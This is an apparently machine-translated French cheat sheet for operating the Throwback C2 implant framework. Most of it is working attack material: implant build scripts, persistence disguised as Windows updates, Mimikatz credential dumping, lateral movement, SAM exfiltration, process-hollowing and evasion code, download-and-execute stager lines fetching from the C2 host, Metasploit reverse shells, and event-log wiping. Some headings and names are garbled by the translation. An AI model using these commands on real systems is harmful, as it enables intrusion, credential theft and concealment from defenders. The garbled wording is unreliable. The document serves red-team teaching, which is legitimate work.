Feuille de chaleur de cadre C2
Aperçu général
Throwback est un implant HTTP/HTTPS avec un serveur C2 conçu pour les opérations de l'équipe rouge et les tests de pénétration. Développé par Silent Break Security, il se compose d'un implant backdoor C++ et d'un serveur de commande et de contrôle basé sur PHP/MySQL. Jetback se concentre sur les communications secrètes, la persistance et les opérations furtives avec une empreinte minimale.
C'est pas vrai. Attention : Cet outil est destiné aux tests de pénétration autorisés et aux exercices d'équipe rouge seulement. Assurez-vous d'avoir une autorisation appropriée avant d'utiliser contre toute cible.
Installation
Préalables
# Install dependencies (Ubuntu/Debian)
sudo apt update
sudo apt install -y apache2 mysql-server php php-mysql php-curl php-json git build-essential mingw-w64
# Install cross-compilation tools for Windows
sudo apt install -y gcc-mingw-w64-x86-64 gcc-mingw-w64-i686
# Start services
sudo systemctl start apache2
sudo systemctl start mysql
sudo systemctl enable apache2
sudo systemctl enable mysql
Configuration de MySQL
-- Configure MySQL database
sudo mysql -u root -p
CREATE DATABASE throwback;
CREATE USER 'throwback'@'localhost' IDENTIFIED BY 'StrongPassword123!';
GRANT ALL PRIVILEGES ON throwback.* TO 'throwback'@'localhost';
FLUSH PRIVILEGES;
EXIT;
```_
### Installation du serveur
```bash
# Clone Throwback repository
git clone https://github.com/silentbreaksec/Throwback.git
cd Throwback
# Set up web server directory
sudo cp -r Server/* /var/www/html/
sudo chown -R www-data:www-data /var/www/html/
sudo chmod -R 755 /var/www/html/
# Configure database connection
sudo nano /var/www/html/config.php
```_
### Fichier de configuration
```php
<?php
// config.php - Database configuration
$servername = "localhost";
$username = "throwback";
$password = "StrongPassword123!";
$dbname = "throwback";
// C2 Server settings
$c2_host = "192.168.1.100";
$c2_port = 80;
$ssl_enabled = false;
$beacon_interval = 30;
$jitter = 10;
// Authentication
$admin_username = "admin";
$admin_password = "SecurePassword456!";
// Encryption key (change this!)
$encryption_key = "YourSecretEncryptionKey123";
// Debug mode
$debug_mode = false;
?>
Configuration du schéma de base de données
-- Create database tables
USE throwback;
CREATE TABLE agents (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255) UNIQUE NOT NULL,
hostname VARCHAR(255),
username VARCHAR(255),
ip_address VARCHAR(45),
os_version VARCHAR(255),
process_id INT,
process_name VARCHAR(255),
first_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
last_seen TIMESTAMP DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
status ENUM('active', 'inactive', 'dead') DEFAULT 'active'
);
CREATE TABLE tasks (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255),
task_id VARCHAR(255) UNIQUE NOT NULL,
command TEXT,
arguments TEXT,
status ENUM('pending', 'sent', 'completed', 'failed') DEFAULT 'pending',
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
completed_at TIMESTAMP NULL,
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);
CREATE TABLE results (
id INT AUTO_INCREMENT PRIMARY KEY,
task_id VARCHAR(255),
agent_id VARCHAR(255),
output LONGTEXT,
error_output TEXT,
received_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (task_id) REFERENCES tasks(task_id),
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);
CREATE TABLE files (
id INT AUTO_INCREMENT PRIMARY KEY,
agent_id VARCHAR(255),
filename VARCHAR(255),
filepath TEXT,
filesize BIGINT,
file_hash VARCHAR(64),
upload_date TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (agent_id) REFERENCES agents(agent_id)
);
Compilation de l'implant
Implant de Windows (x64)
# Compile 64-bit Windows implant
cd Implant
x86_64-w64-mingw32-gcc -o throwback_x64.exe \
-DHOST=\"192.168.1.100\" \
-DPORT=80 \
-DSSL=0 \
-DINTERVAL=30 \
-DJITTER=10 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols for smaller size
x86_64-w64-mingw32-strip throwback_x64.exe
Implant de Windows (x86)
# Compile 32-bit Windows implant
i686-w64-mingw32-gcc -o throwback_x86.exe \
-DHOST=\"192.168.1.100\" \
-DPORT=80 \
-DSSL=0 \
-DINTERVAL=30 \
-DJITTER=10 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols
i686-w64-mingw32-strip throwback_x86.exe
Implant HTTPS
# Compile with SSL support
x86_64-w64-mingw32-gcc -o throwback_https.exe \
-DHOST=\"secure.example.com\" \
-DPORT=443 \
-DSSL=1 \
-DINTERVAL=60 \
-DJITTER=20 \
-DKEY=\"YourSecretEncryptionKey123\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
Script de construction personnalisé
#!/bin/bash
# build_implant.sh - Custom implant builder
HOST="192.168.1.100"
PORT="80"
SSL="0"
INTERVAL="30"
JITTER="10"
KEY="YourSecretEncryptionKey123"
OUTPUT_DIR="./builds"
# Create output directory
mkdir -p $OUTPUT_DIR
# Build x64 implant
echo "[+] Building x64 implant..."
x86_64-w64-mingw32-gcc -o $OUTPUT_DIR/throwback_x64.exe \
-DHOST=\"$HOST\" \
-DPORT=$PORT \
-DSSL=$SSL \
-DINTERVAL=$INTERVAL \
-DJITTER=$JITTER \
-DKEY=\"$KEY\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Build x86 implant
echo "[+] Building x86 implant..."
i686-w64-mingw32-gcc -o $OUTPUT_DIR/throwback_x86.exe \
-DHOST=\"$HOST\" \
-DPORT=$PORT \
-DSSL=$SSL \
-DINTERVAL=$INTERVAL \
-DJITTER=$JITTER \
-DKEY=\"$KEY\" \
throwback.c \
-lws2_32 -lwininet -lcrypt32
# Strip symbols
x86_64-w64-mingw32-strip $OUTPUT_DIR/throwback_x64.exe
i686-w64-mingw32-strip $OUTPUT_DIR/throwback_x86.exe
echo "[+] Implants built successfully in $OUTPUT_DIR"
ls -la $OUTPUT_DIR/
Interface Web
Accès à l'interface
# Access web interface
http://192.168.1.100/index.php
# Login credentials (from config.php)
Username: admin
Password: SecurePassword456!
# HTTPS access (if SSL configured)
https://secure.example.com/index.php
Tableau de bord
| Section | Description |
|---|---|
| Agents | View and manage active implants |
| Tasks | Create and monitor tasks |
| Results | View command execution results |
| Files | Manage uploaded/downloaded files |
| Logs | View system and error logs |
| Settings | Configure C2 server settings |
Gestion des agents
// View active agents
GET /agents.php
// Agent details
GET /agent_details.php?id=AGENT_ID
// Kill agent
POST /kill_agent.php
\\\\{
"agent_id": "AGENT_ID"
\\\\}
Exécution des commandes
Commandes de base
# System information
whoami # Current user
hostname # Computer name
pwd # Current directory
dir # List directory contents
cd [directory] # Change directory
type [file] # Read file contents
# Process management
tasklist # List running processes
taskkill /PID [pid] # Kill process by PID
taskkill /IM [name] # Kill process by name
# Network information
ipconfig /all # Network configuration
netstat -an # Network connections
arp -a # ARP table
route print # Routing table
Opérations de fichiers
# File management
download [file] # Download file from target
upload [local] [remote] # Upload file to target
copy [source] [dest] # Copy file
move [source] [dest] # Move file
del [file] # Delete file
mkdir [directory] # Create directory
rmdir [directory] # Remove directory
# File search
dir /s [pattern] # Search for files
findstr [pattern] [file] # Search within files
Opérations du Greffe
# Registry queries
reg query [key] # Query registry key
reg add [key] /v [value] /d [data] # Add registry value
reg delete [key] /v [value] # Delete registry value
# Common registry locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SYSTEM\CurrentControlSet\Services
Opérations liées aux titres de créance
# Credential harvesting
mimikatz # Execute Mimikatz
sekurlsa::logonpasswords # Dump logon passwords
lsadump::sam # Dump SAM database
lsadump::cache # Dump cached credentials
# Token manipulation
whoami /priv # Check privileges
whoami /groups # Check group membership
Caractéristiques avancées
Mécanismes de persistance
# Registry persistence
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"
# Scheduled task persistence
schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon
# Service persistence
sc create "WindowsUpdateService" binPath= "C:\Windows\Temp\throwback.exe" start= auto
sc start "WindowsUpdateService"
# Startup folder persistence
copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
Mouvement latéral
# Remote execution via WMI
wmic /node:[target] /user:[user] /password:[pass] process call create "cmd.exe /c [command]"
# PSExec-style execution
net use \\[target]\IPC$ /user:[user] [password]
copy throwback.exe \\[target]\C$\Windows\Temp\
sc \\[target] create "TempService" binPath= "C:\Windows\Temp\throwback.exe"
sc \\[target] start "TempService"
# PowerShell remoting
powershell -c "Invoke-Command -ComputerName [target] -Credential (Get-Credential) -ScriptBlock \\\\{[command]\\\\}"
Exfiltration des données
# File exfiltration
download C:\Users\Administrator\Documents\sensitive.docx
download C:\Windows\System32\config\SAM
download C:\inetpub\logs\LogFiles\W3SVC1\*.log
# Database exfiltration
sqlcmd -S [server] -E -Q "SELECT * FROM sensitive_table" -o output.txt
download output.txt
# Registry exfiltration
reg export HKLM\SAM sam.reg
download sam.reg
Steganographie
# Hide data in images
copy /b image.jpg + data.txt hidden.jpg
upload hidden.jpg C:\Windows\Temp\wallpaper.jpg
# Hide executables in legitimate files
copy /b legitimate.pdf + throwback.exe hidden.pdf
Automatisation et écriture
Script d'automatisation PHP
<?php
// automation.php - Automated task execution
require_once 'config.php';
class ThrowbackAutomation \\\\{
private $db;
public function __construct() \\\\{
$this->db = new mysqli($GLOBALS['servername'], $GLOBALS['username'],
$GLOBALS['password'], $GLOBALS['dbname']);
\\\\}
public function getActiveAgents() \\\\{
$result = $this->db->query("SELECT * FROM agents WHERE status = 'active'");
return $result->fetch_all(MYSQLI_ASSOC);
\\\\}
public function createTask($agent_id, $command, $arguments = '') \\\\{
$task_id = uniqid('task_');
$stmt = $this->db->prepare("INSERT INTO tasks (agent_id, task_id, command, arguments) VALUES (?, ?, ?, ?)");
$stmt->bind_param("ssss", $agent_id, $task_id, $command, $arguments);
return $stmt->execute();
\\\\}
public function automatedRecon($agent_id) \\\\{
$commands = [
'whoami',
'hostname',
'ipconfig /all',
'tasklist',
'netstat -an',
'dir C:\Users',
'reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
];
foreach ($commands as $cmd) \\\\{
$this->createTask($agent_id, $cmd);
sleep(2);
\\\\}
\\\\}
public function credentialHarvesting($agent_id) \\\\{
// Check if agent has admin privileges first
$this->createTask($agent_id, 'whoami', '/priv');
sleep(5);
// Execute credential harvesting
$this->createTask($agent_id, 'mimikatz', 'sekurlsa::logonpasswords');
$this->createTask($agent_id, 'mimikatz', 'lsadump::sam');
$this->createTask($agent_id, 'mimikatz', 'lsadump::cache');
\\\\}
public function establishPersistence($agent_id) \\\\{
$persistence_commands = [
'reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WindowsUpdate" /d "C:\Windows\Temp\throwback.exe"',
'schtasks /create /tn "SystemUpdate" /tr "C:\Windows\Temp\throwback.exe" /sc onlogon',
'copy throwback.exe "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"'
];
foreach ($persistence_commands as $cmd) \\\\{
$this->createTask($agent_id, 'cmd', "/c $cmd");
sleep(3);
\\\\}
\\\\}
\\\\}
// Usage
$automation = new ThrowbackAutomation();
$agents = $automation->getActiveAgents();
foreach ($agents as $agent) \\\\{
echo "[+] Processing agent: \\\\{$agent['agent_id']\\\\}\n";
$automation->automatedRecon($agent['agent_id']);
// Wait before credential harvesting
sleep(30);
$automation->credentialHarvesting($agent['agent_id']);
// Establish persistence
$automation->establishPersistence($agent['agent_id']);
\\\\}
?>
Client API Python
#!/usr/bin/env python3
# throwback_client.py - Python API client for Throwback
import requests
import json
import time
from urllib3.exceptions import InsecureRequestWarning
# Disable SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class ThrowbackClient:
def __init__(self, base_url, username, password):
self.base_url = base_url.rstrip('/')
self.session = requests.Session()
self.session.verify = False
self.authenticate(username, password)
def authenticate(self, username, password):
"""Authenticate with Throwback server"""
auth_data = \\\\{
'username': username,
'password': password
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/login.php", data=auth_data)
if response.status_code == 200 and "dashboard" in response.text.lower():
print("[+] Authentication successful")
else:
raise Exception("Authentication failed")
def get_agents(self):
"""Get list of active agents"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/agents.php")
return response.json()
def create_task(self, agent_id, command, arguments=""):
"""Create a new task for an agent"""
task_data = \\\\{
'agent_id': agent_id,
'command': command,
'arguments': arguments
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/tasks.php", data=task_data)
return response.json()
def get_task_results(self, task_id):
"""Get results for a specific task"""
response = self.session.get(f"\\\\{self.base_url\\\\}/api/results.php?task_id=\\\\{task_id\\\\}")
return response.json()
def download_file(self, agent_id, remote_path, local_path):
"""Download file from agent"""
task_data = \\\\{
'agent_id': agent_id,
'command': 'download',
'arguments': remote_path
\\\\}
response = self.session.post(f"\\\\{self.base_url\\\\}/api/download.php", data=task_data)
if response.status_code == 200:
with open(local_path, 'wb') as f:
f.write(response.content)
print(f"[+] File downloaded: \\\\{local_path\\\\}")
else:
print(f"[-] Download failed: \\\\{response.text\\\\}")
def automated_recon(self, agent_id):
"""Perform automated reconnaissance"""
commands = [
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\\Users",
"systeminfo"
]
task_ids = []
for cmd in commands:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.create_task(agent_id, cmd)
if 'task_id' in result:
task_ids.append(result['task_id'])
time.sleep(2)
return task_ids
def wait_for_results(self, task_ids, timeout=300):
"""Wait for task results"""
start_time = time.time()
completed_tasks = []
while len(completed_tasks) ``< len(task_ids) and (time.time() - start_time) < timeout:
for task_id in task_ids:
if task_id not in completed_tasks:
results = self.get_task_results(task_id)
if results and results.get('status') == 'completed':
completed_tasks.append(task_id)
print(f"[+] Task \\\{task_id\\\} completed")
print(f"Output: \\\{results.get('output', '')\\\}")
time.sleep(5)
return completed_tasks
# Usage example
if __name__ == "__main__":
client = ThrowbackClient("http://192.168.1.100", "admin", "SecurePassword456!")
# Get active agents
agents = client.get_agents()
print(f"[+] Found \\\{len(agents)\\\} active agents")
for agent in agents:
agent_id = agent['agent_id']
print(f"[+] Processing agent: \\\{agent_id\\\}")
# Perform reconnaissance
task_ids = client.automated_recon(agent_id)
# Wait for results
completed = client.wait_for_results(task_ids)
print(f"[+] Completed \\\{len(completed)\\\} tasks for agent \\\{agent_id\\\}")
Automatisation PowerShell
# throwback_automation.ps1 - PowerShell automation script
function Invoke-ThrowbackAutomation \\\{
param(
[string]$ServerURL = "http://192.168.1.100",
[string]$Username = "admin",
[string]$Password = "SecurePassword456!"
)
# Create web session
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
# Authenticate
$authData = @\\\{
username = $Username
password = $Password
\\\}
try \\\{
$loginResponse = Invoke-WebRequest -Uri "$ServerURL/login.php" -Method POST -Body $authData -WebSession $session
if ($loginResponse.StatusCode -eq 200) \\\{
Write-Host "[+] Authentication successful"
\\\}
\\\}
catch \\\{
Write-Error "Authentication failed: $_"
return
\\\}
# Get active agents
try \\\{
$agentsResponse = Invoke-WebRequest -Uri "$ServerURL/api/agents.php" -WebSession $session
$agents = $agentsResponse.Content|ConvertFrom-Json
Write-Host "[+] Found $($agents.Count) active agents"
\\\}
catch \\\{
Write-Error "Failed to get agents: $_"
return
\\\}
# Process each agent
foreach ($agent in $agents) \\\{
Write-Host "[+] Processing agent: $($agent.agent_id)"
# Reconnaissance commands
$commands = @(
"whoami",
"hostname",
"ipconfig /all",
"tasklist",
"netstat -an",
"dir C:\Users",
"systeminfo"
)
foreach ($cmd in $commands) \\\{
$taskData = @\\\{
agent_id = $agent.agent_id
command = $cmd
arguments = ""
\\\}
try \\\{
$taskResponse = Invoke-WebRequest -Uri "$ServerURL/api/tasks.php" -Method POST -Body $taskData -WebSession $session
Write-Host "[+] Task created for command: $cmd"
Start-Sleep -Seconds 2
\\\}
catch \\\{
Write-Warning "Failed to create task for command '$cmd': $_"
\\\}
\\\}
# Wait before processing next agent
Start-Sleep -Seconds 10
\\\}
\\\}
# Execute automation
Invoke-ThrowbackAutomation
Techniques d'évacuation
Évasion anti-Virus
// AV evasion techniques in implant code
// String obfuscation
char obfuscated_url[] = \\\{0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x00\\\}; // "http://"
// API hashing
DWORD hash_api(char* api_name) \\\{
DWORD hash = 0;
while (*api_name) \\\{
hash = ((hash << 5) + hash) + *api_name++;
\\\}
return hash;
\\\}
// Sleep obfuscation
void obfuscated_sleep(DWORD milliseconds) \\\{
LARGE_INTEGER interval;
interval.QuadPart = -(milliseconds * 10000LL);
NtDelayExecution(FALSE, &interval);
\\\}
// Process hollowing
BOOL process_hollowing(char* target_process, char* payload) \\\{
STARTUPINFO si = \\\{0\\\};
PROCESS_INFORMATION pi = \\\{0\\\};
// Create suspended process
if (!CreateProcess(target_process, NULL, NULL, NULL, FALSE,
CREATE_SUSPENDED, NULL, NULL, &si, &pi)) \\\{
return FALSE;
\\\}
// Unmap original image
ZwUnmapViewOfSection(pi.hProcess, GetImageBase(pi.hProcess));
// Allocate memory and write payload
LPVOID base_addr = VirtualAllocEx(pi.hProcess, GetImageBase(pi.hProcess),
payload_size, MEM_COMMIT|MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess, base_addr, payload, payload_size, NULL);
// Resume execution
ResumeThread(pi.hThread);
return TRUE;
\\\}
Évasion du réseau
// Domain fronting implementation
char fronted_domain[] = "cdn.example.com";
char real_host[] = "c2.malicious.com";
// Custom user agents
char user_agents[][256] = \\\{
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
\\\};
// Jitter implementation
void jittered_sleep(DWORD base_interval, DWORD jitter_percent) \\\{
DWORD jitter = (base_interval * jitter_percent) / 100;
DWORD min_sleep = base_interval - jitter;
DWORD max_sleep = base_interval + jitter;
DWORD actual_sleep = min_sleep + (rand() % (max_sleep - min_sleep + 1));
Sleep(actual_sleep * 1000);
\\\}
// Traffic shaping
void shape_traffic(char* data, DWORD data_size) \\\{
// Split large data into smaller chunks
DWORD chunk_size = 1024 + (rand() % 2048); // Random chunk size
DWORD chunks = (data_size + chunk_size - 1) / chunk_size;
for (DWORD i = 0; i < chunks; i++) \\\{
DWORD current_chunk_size = min(chunk_size, data_size - (i * chunk_size));
send_chunk(data + (i * chunk_size), current_chunk_size);
// Random delay between chunks
Sleep((rand() % 5000) + 1000); // 1-6 seconds
\\\}
\\\}
Évasion de mémoire
// Memory encryption
void encrypt_memory(LPVOID address, SIZE_T size, BYTE key) \\\{
BYTE* ptr = (BYTE*)address;
for (SIZE_T i = 0; i < size; i++) \\\{
ptr[i] ^= key;
\\\}
\\\}
// Heap encryption
typedef struct \\\{
LPVOID original_addr;
SIZE_T size;
BYTE key;
\\\} ENCRYPTED_HEAP;
ENCRYPTED_HEAP* allocate_encrypted_heap(SIZE_T size) \\\{
ENCRYPTED_HEAP* heap = malloc(sizeof(ENCRYPTED_HEAP));
heap->``original_addr = VirtualAlloc(NULL, size, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
heap->size = size;
heap->key = (BYTE)(rand() % 256);
// Encrypt allocated memory
encrypt_memory(heap->original_addr, heap->size, heap->key);
return heap;
\\\\}
// Stack string obfuscation
void obfuscated_string_copy(char* dest, char* src, BYTE key) \\\\{
while (*src) \\\\{
*dest++ = *src++ ^ key;
\\\\}
*dest = '\0';
\\\\}
Intégration avec d'autres outils
Intégration des métadonnées
# Use Throwback with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=8443 -f exe -o meterpreter.exe
# Upload via Throwback
upload meterpreter.exe C:\Windows\Temp\update.exe
# Execute Metasploit payload
cmd /c C:\Windows\Temp\update.exe
# Handle in Metasploit
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 8443
run
Intégration de l'Empire
# Generate Empire stager
# Use Throwback for initial access, pivot to Empire
# From Throwback implant
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/empire_stager.ps1')"
# Handle in Empire
./empire
listeners
uselistener http
set Host 192.168.1.100
set Port 8080
execute
Intégration de la grève du cobalt
# Beacon integration
# Generate Cobalt Strike beacon
# Use Throwback for initial access, pivot to Beacon
# From Throwback implant
cmd /c powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/beacon.ps1')"
# Handle in Cobalt Strike team server
Sécurité opérationnelle
Sécurité des communications
# Use HTTPS with valid certificates
# Configure domain fronting
# Implement certificate pinning
# Use legitimate user agents
# Example HTTPS configuration
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -subj "/C=US/ST=State/L=City/O=Organization/CN=secure.example.com"
# Configure Apache for HTTPS
sudo a2enmod ssl
sudo systemctl restart apache2
Analyse du trafic Évasion
# Mimic legitimate traffic patterns
# Use common HTTP methods and headers
# Implement realistic timing
# Blend with normal network traffic
# Example legitimate traffic mimicking
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Anti-forensiques
# Clear event logs
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Timestomping
powershell -c "$(Get-Item file.exe).LastWriteTime = '01/01/2020 12:00:00'"
# Secure deletion
sdelete -z -s C:\Windows\Temp\
Dépannage
Questions communes
# Implant not connecting
1. Check firewall rules
2. Verify web server configuration
3. Test network connectivity
4. Check database connection
# Database connection issues
# Test MySQL connection
mysql -u throwback -p -h localhost throwback
# Web server issues
# Check Apache error logs
sudo tail -f /var/log/apache2/error.log
# Check PHP errors
sudo tail -f /var/log/apache2/error.log|grep PHP
Mode de débogage
// Enable debug mode in config.php
$debug_mode = true;
// Check debug logs
tail -f /var/log/apache2/access.log
tail -f /var/log/apache2/error.log
Optimisation des performances
# Optimize MySQL
sudo mysql_secure_installation
# Optimize Apache
sudo a2enmod rewrite
sudo a2enmod deflate
sudo systemctl restart apache2
# Monitor system resources
htop
iotop
netstat -tulpn
Meilleures pratiques
Planification opérationnelle
- ** Configuration avant l'engagement**: Configurer le serveur et compiler les implants avant l'engagement
- ** Protocoles de communication** : Établir des canaux de communication C2 sécurisés
- ** Traitement des données** : Mettre en œuvre une collecte et un stockage sécurisés des données
- Procédures de nettoyage: Plan d'enlèvement des artefacts et de nettoyage opérationnel
- Coordination de l'équipe: utiliser le C2 centralisé pour la collaboration de l'équipe
Considérations en matière de sécurité
# Secure deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates
# Implant management
# Use unique encryption keys
# Implement kill dates
# Regular implant rotation
# Secure communication channels
Documentation et rapports
# Operation documentation
# Maintain detailed logs
# Document all activities
# Track compromised systems
# Generate executive reports
# Artifact tracking
# Monitor IOCs
# Document forensic artifacts
# Implement attribution prevention
Ressources
- [Dépôt GitHub] (LINK_5)
- [Blogue sur la sécurité de la pause silencieuse] (LINK_5)
- Guide des opérations de l'équipe rouge
- [Cadre MITRE ATT&CK] (LINK_5)
- Opérations de l'équipe rouge SANS
*Cette feuille de triche fournit une référence complète pour l'utilisation du cadre Throwback C2. Assurez-vous toujours d'avoir une autorisation appropriée avant d'effectuer les opérations de l'équipe rouge ou les tests de pénétration. *